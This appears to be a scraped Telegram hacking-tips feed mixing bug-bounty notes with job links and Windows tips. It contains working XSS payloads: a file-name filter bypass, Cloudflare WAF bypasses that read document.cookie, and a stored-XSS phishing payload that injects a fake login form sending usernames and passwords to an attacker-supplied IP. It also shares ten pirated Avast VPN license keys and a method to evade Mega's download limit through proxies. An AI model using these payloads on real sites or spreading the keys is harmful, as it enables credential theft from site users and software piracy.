Termux All Command [Telegram Group]

Bypass XSS Filter in File upload functionality "filename=" parameter Transform Self XSS To Blind XSS . testtest ----- XSS Triggered --> True ----- Alert Cookie ----> False ----- File Submitted --> False ----- Blind XSS -------> False testtest ----- XSS Triggered --> True ----- Alert Cookie ----> True ----- File Submitted --> False ----- Blind XSS -------> False testtest.jpg ----- XSS Triggered --> True ----- Alert Cookie ----> True ----- File Submitted --> True ----- Blind XSS -------> False test>/xxxsssss.jpg';>test.jpg ----- XSS Triggered --> True ----- Alert Cookie ----> True ----- File Submitted --> True ----- Blind XSS -------> True .

▪️How To Find Who Logged Into Your Computer And When? —> Step 1: First of all, type “gpedit.msc” in the start menu and hit enter. —> Step 2: Now browse to the following folder: Local Computer Policy –> Computer Configuration –> Windows Settings –> Security Settings –> Local Policies –> Audit Policy. —> Step 3: Now you need to double click on Audit Logon event and then check “Success” and “Failure” and click on OK. —> Step 4: Now you need to type “Event Viewer” on the start menu and hit enter. —> Step 5: Now navigate to: Windows logs –> Security. —> Step 6: Now you need to look for the events with event ID 4624 (4624 represent successful login events) —> Step 7: You can double click on the events to know the time and some extra details about the login. That’s it! you are done. This is the easiest way to track all the login attempts in your Windows computer. Enjoy 👍❤️

▪️A simple visual explanation of HTTP Request methods. These five are widely used: 👇🏻 GET POST PUT PATCH DELETE

Reflected XSS: 🤑 ---------------- Steps: --> Find origin ip using Google dork --> Find search parameter --> inject payload --> B0oooM Google dork: ---> (target.com) (site:*.*.29.* |site:*.*.28.* |site:*.*.27.* |site:*.*.26.* |site:*.*.25.* |site:*.*.24.* |site:*.*.23.* |site:*.*.22.* |site:*.*.21.* |site:*.*.20.* |site:*.*.19.* |site:*.*.18.* |site:*.*.17.* |site:*.*.16.* |site:*.*.15.* |site:*.*.14.* |site:*.*.13.* |site:*.*.12.* |site:*.*.11.* |site:*.*.10.* |site:*.*.9.* |site:*.*.8.* |site:*.*.7.* |site:*.*.6.* |site:*.*.5.* |site:*.*.4.* |site:*.*.3.* |site:*.*.2.* |site:*.*.1.* |site:*.*.0.*) ---> Payload: </TITLE><​SCRIPT>alert("XSS");<​/SCRIPT>

a payload to create a phishing page while you get a xss vulnerability, like stored xss or Dom xss '><script>document.write('<h3>Please login to continue</h3><form action=http://YOURIP:PORT/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--

How to Download From Mega Without Any Limit You can easily bypass the Mega download limit of 5GB and Download as much content as you want. Today I want to share with you a method to download from Mega.nz without limited bandwidth (normally its 5Gb/day). Let’s dive into it! 👉 Step 1: Download the software MegaBasterd from Github: https://github.com/tonikelope/megabasterd 👉 Step 2: Take a free proxy from any proxy supplier that you have, I use a free proxy: https://proxyscrape.com/free-proxy-list 👉 Step 3: Install proxies to software: Copy all free proxies, go to Edit → Settings → Download → paste proxies like the photo below

XSS - CloudFlare WAF bypass 😋 Payload : <svg onload=alert&#0000000040document.cookie)>

Critical misconfiguration in Firebase — Bug bounty : https://offsec01.medium.com/critical-misconfiguration-in-firebase-e682ec4239d6

XSS found -- works only on chrome payload --> For firefox -->

Welcome to Asperis Security's XSS Detection Tool! This tool is designed to help identify and validate Cross-Site Scripting (XSS) vulnerabilities through GET requests. With precision and flexibility, it allows security researchers, pentesters and bug bounty hunters to find and mitigate potential XSS issues. https://github.com/Asperis-Security/xssFuzz #XSS

#Bug Bounty Notes : https://shreyaschavhan.notion.site/Bug-Bounty-Notes-4d22dc25c265458f8826d2d09820c050

💣Dorks I use to research bugs through thehackernews site:thehackernews.com "unauthenticated" site:thehackernews.com "vulnerability" site:thehackernews.com "CVE-2024"

Companies List that are HIRING for 100% REMOTE. 1. Deltek - https://lnkd.in/dkSfGNbF 2. Confluent - https://lnkd.in/dNSTmUeH 3. Cengage Group - https://lnkd.in/gGkT6jRZ 4. Quest Software - https://lnkd.in/dkHSNGmM 5. Upstart - https://lnkd.in/dGR4DJ52 6. hims & hers - https://lnkd.in/gr_SdVdE 7. UserGems - https://lnkd.in/gXi3mNf6 8. Abnormal Security - https://lnkd.in/gn5M4VDF 9. Cash App - https://lnkd.in/gdp8yUm8 10. LogicGate - https://lnkd.in/gjgX27Bc 11. Faire - https://lnkd.in/gYRNr9VM 12. Renaissanc - https://lnkd.in/gesiM_Dw 13. Rec Room - https://lnkd.in/gErDuTNa 14. VGS - https://lnkd.in/g7Ajb77F 15. VAST Data - https://lnkd.in/gMUFt4y9 16. Sorcero - https://lnkd.in/gpmDTnH7 17. McGraw Hill - https://lnkd.in/g59pzFf4 18. Patreon - https://lnkd.in/gzQptMcQ 19. Beekeeper - https://lnkd.in/gxd7rs7Q 20. Upwork - https://lnkd.in/gt4HYmd6 21. DocuSign - https://lnkd.in/ggfUncZf 22. DealHub. io - https://lnkd.in/gyNED4yp 23. Census - https://lnkd.in/gAq7PGzc 24. Intrado - https://lnkd.in/gH3wuNWZ 25. Cloudflare - https://lnkd.in/g9JPXp2F 26. Funded. club - https://lnkd.in/gpH4FazA 27. Workiva - https://lnkd.in/g-FUYYdR 28. MissionWired - https://lnkd.in/gMA6AVdG 29. Workera - https://lnkd.in/g2YzZu-H 30. Jenius Bank - https://lnkd.in/gxGqHGkH 31. Goinstacare - https://lnkd.in/d6ZN5FVD 32. Uplers - https://www.uplers.com 33. Quantum - https://lnkd.in/d8jFCeuU 34. Canonical - https://lnkd.in/d9mf5Rr3 35. Kemecon - http://kemecon.com 36. Gitlab - https://lnkd.in/d2eGyKRv 37. DigitalOcean - https://lnkd.in/dYgDZ-WF 38. Atlassian - https://lnkd.in/dp-SFzfT 39. AngelOne - https://lnkd.in/dk3NwDn6 40. Shopify - https://lnkd.in/d9zpGKTy 41. Appcues - https://lnkd.in/dp2Jiupp 42. Arkency - https://lnkd.in/dBB_wZaR 43. Automattic - https://lnkd.in/ddSBdusv 44. Awesomemotive - https://lnkd.in/diZZjb4J 45. Buffer - https://lnkd.in/d7ihgxkA 46. Constructor - https://lnkd.in/daBzMdxM 47. Contra - https://contra.com/careers 48. Doist - https://doist.com/careers/ 49. DuckDuckGo - https://lnkd.in/d_Kv9dM6 50. Bold - https://lnkd.in/dZQ8dQnq 51. Akamai Technologies - https://lnkd.in/dpTN5nPT 52. Cloudbeds - https://lnkd.in/dg3gC5v6 53. Mentorsity - https://lnkd.in/d8YyGHNH 54. Expert Thinking - https://lnkd.in/dz_4HFUi 55. iVisa - https://ivisa.breezy.hr/ 56. Affordmate - http://www.affordmate.com 57. Xapobank - http://www.xapobank.com 58. Symetra - http://www.symetra.com 59. Docker, Inc - https://lnkd.in/gfX5-pQG

Avast Secureline Unlimited VPN Exp: 31 Days User: 100 Devices x 10 Key: HGMSUF-A9B87J-44CGSE Key: 8TM62S-NBP8M2-444GB6 Key: WXSVQ9-ZQHVV2-44UGA2 Key: GWCU3B-SH6QKJ-44UGBA Key: J484NS-2KSR7J-44UG52 Key: 8BUGQE-VD89GJ-43UGW2 Key: GFX3GS-H9S4T2-43UGCJ Key: RT8NT6-W23HH2-43UGVJ Key: L2R3NZ-HNB8E2-43UGDJ Key: RZCD9A-QPXQNJ-43UGWA

𝗖𝗹𝗼𝘂𝗱𝗳𝗹𝗮𝗿𝗲 𝗕𝘆𝗽𝗮𝘀𝘀 𝗣𝗮𝘆𝗹𝗼𝗮𝗱 0</option></select><img/src=xon=()onx+honerror=alert(1)>ss<svg/onload​=prompt(document.cookie)%20>

🪲How I stay updated with CVEs? curl https://cvedb[.]shodan[.]io/cves | jq | grep "cve_id"

Pen-Andro - An automated script to Automate installation of Android pentest Apps, Frida server and moving Burp suite certificate to root folder. A useful Android pentesting tool! » https://lnkd.in/gNyDXYZK

🚨Advancing Dorking Techniques day by day hashtag#OSINT Identify Malicious or Cloned Domains via IP Addresses by Google dorking. (shopify.com) (site:*.*.255.* | site:*.*.254.* | site:*.*.253.* | site:*.*.252.* | site:*.*.251.* | site:*.*.250.* | site:*.*.249.* | site:*.*.248.* | site:*.*.247.* | site:*.*.246.* | site:*.*.245.* | site:*.*.244.* | site:*.*.243.* | site:*.*.242.* | site:*.*.241.* | site:*.*.240.*) Breakdown: • Searches for domains related to Shopify hosted or keyword embedded on specific IP address ranges. • Helps identify potential malicious, cloned, or open dashboard domains. • By focusing on higher IP ranges, you might uncover less secure or misconfigured hosts.

💣One of the difficult bug to hunt for is 💡HTTP Request Smuggling 👇Medium articles to learn [1] https://lnkd.in/g2F_CVT4 [2] https://lnkd.in/gW5bYxx2 [3] https://lnkd.in/gThRcny5